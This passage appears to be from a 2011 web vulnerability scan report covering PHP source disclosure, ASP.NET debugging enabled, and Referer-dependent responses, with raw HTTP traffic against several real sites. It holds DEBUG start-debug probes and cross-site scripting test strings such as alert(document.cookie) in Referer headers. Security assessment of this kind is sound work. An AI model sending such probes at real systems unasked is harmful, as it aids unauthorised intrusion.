<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.11. http://www.neogames.com/news-and-events/neogames-launches-38-games-in-2010 previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/news-and-events/neogames-launches-38-games-in-2010

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /news-and-events/neogames-launches-38-games-in-2010 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 9535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.12. http://www.neogames.com/our-partners previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/our-partners

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /our-partners HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305548318.2; __utmc=120915991; __utmb=120915991.2.10.1305548318

Response

14.13. http://www.neogames.com/products previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/products

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /products HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 9094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

15. ASP.NET debugging enabled previous next
There are 3 instances of this issue:

http://affiliates.interwetten.com/Default.aspx
http://www.gamblingtherapy.org/Default.aspx
http://www.paypoint.co.uk/Default.aspx

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

15.1. http://affiliates.interwetten.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://affiliates.interwetten.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: affiliates.interwetten.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 16 May 2011 12:20:11 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: BIGipServerPool_affiliates.interwetten.com=1727730092.20480.0000; path=/

Debug access denied to '/Default.aspx'.

15.2. http://www.gamblingtherapy.org/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gamblingtherapy.org
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.gamblingtherapy.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 16 May 2011 12:20:23 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.3. http://www.paypoint.co.uk/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.paypoint.co.uk
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.paypoint.co.uk
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Mon, 16 May 2011 12:13:44 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16. Referer-dependent response previous next
There are 5 instances of this issue:

http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
http://d.tradex.openx.com/afr.php
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/plugins/likebox.php
http://www.primescratchcards.com/index.asp

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

16.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/Metacafe/lists/metacafe/statuses.json

Request 1

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305550176-17470-26551
X-RateLimit-Limit: 150
ETag: "e5d1cb505007380f6115cd2151534fc1"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 12:49:36 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04505
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114be3e990c
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 13f34ed7cc97704ba4dad483c845028cdf545995
X-RateLimit-Reset: 1305553776
Set-Cookie: original_referer=ZLhHHTiegr%2BuELNlzhqsTmXCAErbgtcXGmlVl75vKClzAZioSrWmX1f0QknK5wh8oE41IPFgvC8H5lwFMcpBvsbGUrM2CLCfSyyLTsrrntY99PQJLtdZtZXzC2SKRGyfMlLDL2xkw2ifyAgy%2BYKs1A%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCbC2vgvAToHaWQiJTU3YWEwODgzYzhmNDJk%250AZWNjODAyY2IxOWMyZDIzYzEzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--bb094e11ffa55fe4d38d2f1900f6149571445d42; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35019

TWTR.Widget.receiveCallback_1([{"retweet_count":0,"in_reply_to_status_id":null,"text":"Raised in the circus, perpetually homeless, and always fabulous, meet one of pop's most dynamic rising stars. http:\/\/bit.ly\/j8cAY7","created_at":"Sat May 14 20:32:18 +0000 2011","in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"contributors":null,"retweeted":false,"in_reply_to_user_id_str":null,"source":"\u003Ca href=\"http:\/\/www.tweetdeck.com\" rel=\"nofollow\"\u003ETweetDeck\u003C\/a\u003E","id_str":"69500306433642497","place":null,"coordinates":null,"geo":null,"in_reply_to_user_id":null,"truncated":false,"user":{"show_all_inline_media":false,"geo_enabled":false,"notifications":null,"created_at":"Tue Nov 23 21:57:17 +0000 2010","profile_sidebar_border_color":"C0DEED","contributors_enabled":false,"following":null,"description":"Metacafe Music is your home for music videos from your favorite artists, with a special focus on independent bands, live events, and interactive content.","profile_use_background_image":true,"profile_image_url":"http:\/\/a2.twimg.com\/profile_images\/1174206695\/Metacafe_Music_Thumb_normal.png","default_profile_image":false,"statuses_count":460,"verified":false,"profile_background_color":"C0DEED","profile_background_image_url":"http:\/\/a3.twimg.com\/images\/themes\/theme1\/bg.png","favourites_count":0,"friends_count":137,"screen_name":"metacafemusic","id_str":"219083877","default_profile":true,"follo
...[SNIP]...

Request 2

GET /1/Metacafe/lists/metacafe/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1305550175438=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; guest_id=130530556419951159; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305550187-30836-50404
X-RateLimit-Limit: 150
ETag: "e5d1cb505007380f6115cd2151534fc1"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 12:49:47 GMT
X-RateLimit-Remaining: 122
X-Runtime: 0.04374
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114be3e990c
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 7bbea65832b5e58416f2db38beeb5a39aef7fe10
X-RateLimit-Reset: 1305553776
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHnt2vgvAToHaWQiJTQ0MjIwNDc0OWQ4Mjlm%250AMmIyYzljNTBkYzMwNDJiOWE4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--36e9a9796c33df8a01554c7e8e74559c621ecd85; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35019

TWTR.Widget.receiveCallback_1([{"retweet_count":0,"in_reply_to_status_id":null,"text":"Raised in the circus, perpetually homeless, and always fabulous, meet one of pop's most dynamic rising stars. http:\/\/bit.ly\/j8cAY7","created_at":"Sat May 14 20:32:18 +0000 2011","in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"contributors":null,"retweeted":false,"in_reply_to_user_id_str":null,"source":"\u003Ca href=\"http:\/\/www.tweetdeck.com\" rel=\"nofollow\"\u003ETweetDeck\u003C\/a\u003E","id_str":"69500306433642497","place":null,"coordinates":null,"geo":null,"in_reply_to_user_id":null,"truncated":false,"user":{"show_all_inline_media":false,"geo_enabled":false,"notifications":null,"created_at":"Tue Nov 23 21:57:17 +0000 2010","profile_sidebar_border_color":"C0DEED","contributors_enabled":false,"following":null,"description":"Metacafe Music is your home for music videos from your favorite artists, with a special focus on independent bands, live events, and interactive content.","profile_use_background_image":true,"profile_image_url":"http:\/\/a2.twimg.com\/profile_images\/1174206695\/Metacafe_Music_Thumb_normal.png","default_profile_image":false,"statuses_count":460,"verified":false,"profile_background_color":"C0DEED","profile_background_image_url":"http:\/\/a3.twimg.com\/images\/themes\/theme1\/bg.png","favourites_count":0,"friends_count":137,"screen_name":"metacafemusic","id_str":"219083877","default_profile":true,"follow_request_sent":null,"profile_text_color":"333333","lang":"en","profile_sidebar_fill_color":"DDEEF6","followers_count":114,"protected":false,"location":"San Francisco","profile_background_tile":false
...[SNIP]...

16.2. http://d.tradex.openx.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://d.tradex.openx.com
Path:	/afr.php

Request 1

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=10ca289019af23418475b1d5b7b65193; expires=Tue, 15-May-2012 12:52:09 GMT; path=/
Content-Length: 3694
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"d6536fd1-a88d-43f5-b56c-d55966e08548",
"size":"728x90",
"floor":"0.56",
"url":"http:\/\/ad.doubleclick.net\/N6707\/adi\/meta.homepage\/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379",
"channel":"oxpv1:34-632-1929-1558-4408",
"hrid":"f5bd161123c6f12e4d23f8adc2f8ffa1-1305550329",
"beacon":"<div id='beacon_12a7ee2314' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&campaignid=632&zoneid=4408&cb=12a7ee2314&r_id=f5bd161123c6f12e4d23f8adc2f8ffa1&r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"\r\n<SCRIPT TYPE=\"text\/javascript\" SRC=\"http:\/\/ad.yieldmanager.com\/st?ad_type=ad&ad_size=728x90&section=1703625\"><\/SCRIPT>\r\n<div id='beacon_12a7ee2314' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=7833&campaignid=2580&zoneid=4408&loc=1&referer=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cb=12a7ee2314&r_id=f5bd161123c6f12e4d23f8adc2f8ffa1&r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=038bd2cb2b9b6198d6ef04002b0b90c5; expires=Tue, 15-May-2012 12:52:09 GMT; path=/
Content-Length: 2208
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"d6536fd1-a88d-43f5-b56c-d55966e08548",
"size":"728x90",
"floor":"0.56",
"channel":"oxpv1:34-632-1929-1558-4408",
"hrid":"2c6e1f58e6b85b2abc2a316f7a8773a0-1305550329",
"beacon":"<div id='beacon_a9eb8f7dba' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&campaignid=632&zoneid=4408&cb=a9eb8f7dba&r_id=2c6e1f58e6b85b2abc2a316f7a8773a0&r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"\r\n<SCRIPT TYPE=\"text\/javascript\" SRC=\"http:\/\/ad.yieldmanager.com\/st?ad_type=ad&ad_size=728x90&section=1703625\"><\/SCRIPT>\r\n<div id='beacon_a9eb8f7dba' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=7833&campaignid=2580&zoneid=4408&loc=1&cb=a9eb8f7dba&r_id=2c6e1f58e6b85b2abc2a316f7a8773a0&r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script>
<script type="text/javascript" src="http://bid.openx.net/jstag"></script>
<noscript>
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=728x90&section=1703625"></SCRIPT>
<div id='beacon_a9eb8f7dba' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d.tradex.openx.com/lg.php?bannerid=7833&campaignid=2580&zoneid=4408&loc=1&cb=a9eb8f7dba&r_id=2c6e1f58e6b85b2abc2a316f7a8773a0&r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div></noscript>
</body>
</html>

16.3. http://www.facebook.com/PrimeScratchCards previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/PrimeScratchCards

Request 1

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=RTfEP; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.1.35
X-Cnection: close
Date: Mon, 16 May 2011 12:47:13 GMT
Content-Length: 35595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<input type="hidden" name="lsd" value="RTfEP" autocomplete="off" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u003323_1"><input value="Login" tabindex="4" type="submit" id="u003323_1" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" autocomplete="off" id="next" name="next" value="http://www.facebook.com/PrimeScratchCards" /><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" autocomplete="off" id="lsd" name="lsd" value="RTfEP" /></form>
</div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div id="toolbarContainer"><div id="pagelet_toolbar"></div></div><div id="mainContainer"><div id="leftColContainer"><div id="leftCol"><div id="pagelet_left_column"></div></div></div><div id="contentCol" class="clearfix hasRightCol"><div id="headerArea"><div id="pagelet
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=lucQy; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.154.43
X-Cnection: close
Date: Mon, 16 May 2011 12:47:18 GMT
Content-Length: 35306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<input type="hidden" name="lsd" value="lucQy" autocomplete="off" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u003824_1"><input value="Login" tabindex="4" type="submit" id="u003824_1" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" autocomplete="off" id="next" name="next" value="http://www.facebook.com/PrimeScratchCards" /><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" autocomplete="off" id="lsd" name="lsd" value="lucQy" /></form>
</div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div id="toolbarContainer"><div id="pagelet_toolbar"></div></div><div id="mainContainer"><div id="leftColContainer"><div id="leftCol"><div id="pagelet_left_column"></div></div></div><div id="contentCol" class="clearfix hasRightCol"><div id="headerArea"><div id="pagelet
...[SNIP]...

16.4. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df369d8b3f%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.254.27
X-Cnection: close
Date: Mon, 16 May 2011 12:49:45 GMT
Content-Length: 9862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd11d6939a7e8c77242104" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">88,134</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a 